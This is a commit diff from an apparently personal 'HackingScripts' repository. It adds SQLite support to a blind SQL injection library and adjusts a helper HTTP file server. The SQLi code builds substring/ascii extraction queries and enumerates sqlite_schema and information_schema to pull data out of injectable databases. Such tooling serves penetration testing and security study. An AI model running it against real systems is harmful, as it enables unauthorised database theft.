Roman/HackingScripts
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added sqlite (SQLi)

Browse Source
This commit is contained in:
Roman Hergenreder 2024-04-21 17:41:16 +02:00
parent f11f99fdf4
commit 12007c84c1
2 changed files with 44 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
fileserver.py
View File

@ -91,14 +91,23 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
status_code = 200 if len(result) < 1 else result[0] status_code = 200 if len(result) < 1 else result[0]
data = b"" if len(result) < 2 else result[1] data = b"" if len(result) < 2 else result[1]
headers = { } if len(result) < 3 else result[2] headers = { } if len(result) < 3 else result[2]
else: elif isinstance(result, int):
status_code = result status_code = result
data = b"" data = b""
headers = {} headers = {}
elif result is None:
status_code = 201
data = b""
headers = {}
else:
status_code = 200
data = data if type(data) in [bytes, bytearray] else str(data).encode()
headers = {}
if path in self.server.dumpRequests: if path in self.server.dumpRequests:
headers["Access-Control-Allow-Origin"] = "*" headers["Access-Control-Allow-Origin"] = "*"
headers["Connection"] = "Close"
headers["Content-Length"] = len(util.nvl(data, b"")) headers["Content-Length"] = len(util.nvl(data, b""))
if len(headers) == 0: if len(headers) == 0:
@ -174,7 +183,7 @@ class HttpFileServer(HTTPServer):
data = data.encode("UTF-8") data = data.encode("UTF-8")
headers = { headers = {
"Access-Control-Allow-Origin": "*", "Access-Control-Allow-Origin": "*"
} }
if mime_type: if mime_type:

33
sqli.py
View File

@ -33,6 +33,10 @@ class SQLi(ABC):
return rows return rows
@abstractmethod
def ascii(self):
pass
@abstractmethod @abstractmethod
def extract_int(self, column: str, table=None, condition=None, def extract_int(self, column: str, table=None, condition=None,
offset=None, verbose=False): offset=None, verbose=False):
@ -201,7 +205,7 @@ class BlindSQLi(SQLi, ABC):
cur_str = "" cur_str = ""
while True: while True:
found = False found = False
cur_column = f"ascii(substr({column},{len(cur_str) + 1},1))" cur_column = self.ascii() + f"(substr({column},{len(cur_str) + 1},1))"
if charset: if charset:
query = self.build_query(cur_column, table, condition, offset) query = self.build_query(cur_column, table, condition, offset)
for c in charset: for c in charset:
@ -249,6 +253,8 @@ class PostgreSQLi(SQLi, ABC):
f"table_schema='{schema}' AND table_name='{table}'", f"table_schema='{schema}' AND table_name='{table}'",
verbose=verbose) verbose=verbose)
def ascii(self):
return "ascii"
class MySQLi(SQLi, ABC): class MySQLi(SQLi, ABC):
def get_database_version(self, verbose=False): def get_database_version(self, verbose=False):
@ -268,3 +274,28 @@ class MySQLi(SQLi, ABC):
return self.extract_multiple_strings("column_name", "information_schema.columns", return self.extract_multiple_strings("column_name", "information_schema.columns",
f"table_schema='{schema}' AND table_name='{table}'", f"table_schema='{schema}' AND table_name='{table}'",
verbose=verbose) verbose=verbose)
def ascii(self):
return "ascii"
class SQLitei(SQLi, ABC):
def get_database_version(self, verbose=False):
return self.extract_string("sqlite_version()", verbose=verbose)
def get_current_user(self, verbose=False):
raise Exception("Not implemented!")
def get_current_database(self, verbose=False):
raise Exception("Not implemented!")
def get_table_names(self, verbose=False):
return self.extract_multiple_strings("name", "sqlite_schema", f"type='table'",
verbose=verbose)
def get_column_names(self, table: str, schema: str, verbose=False):
# TODO: we could query the "sql" column and parse it using regex
raise Exception("Not implemented!")
def ascii(self):
return "unicode"